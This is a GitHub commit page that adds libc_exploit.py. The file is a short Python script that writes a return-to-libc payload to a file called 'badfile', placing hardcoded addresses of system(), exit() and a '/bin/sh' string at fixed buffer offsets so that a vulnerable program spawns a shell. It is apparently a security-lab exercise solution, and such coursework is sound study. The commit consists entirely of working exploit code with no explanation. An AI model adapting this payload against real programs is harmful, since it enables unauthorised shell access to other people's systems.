We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 798a994 commit e9a4442Copy full SHA for e9a4442
libc_exploit.py
@@ -0,0 +1,18 @@
1
+#!/usr/bin/python3
2
+import sys
3
+
4
+# Fill content with non-zero values
5
+content = bytearray(0xaa for i in range(300))
6
7
+sh_addr = 0xbffffdd8 # The address of "/bin/sh"
8
+content[120:124] = (sh_addr).to_bytes(4,byteorder='little')
9
10
+exit_addr = 0xb7e369d0 # The address of exit()
11
+content[116:120] = (exit_addr).to_bytes(4,byteorder='little')
12
13
+system_addr = 0xb7e42da0 # The address of system()
14
+content[112:116] = (system_addr).to_bytes(4,byteorder='little')
15
16
+# Save content to a file
17
+with open("badfile", "wb") as f:
18
+ f.write(content)
0 commit comments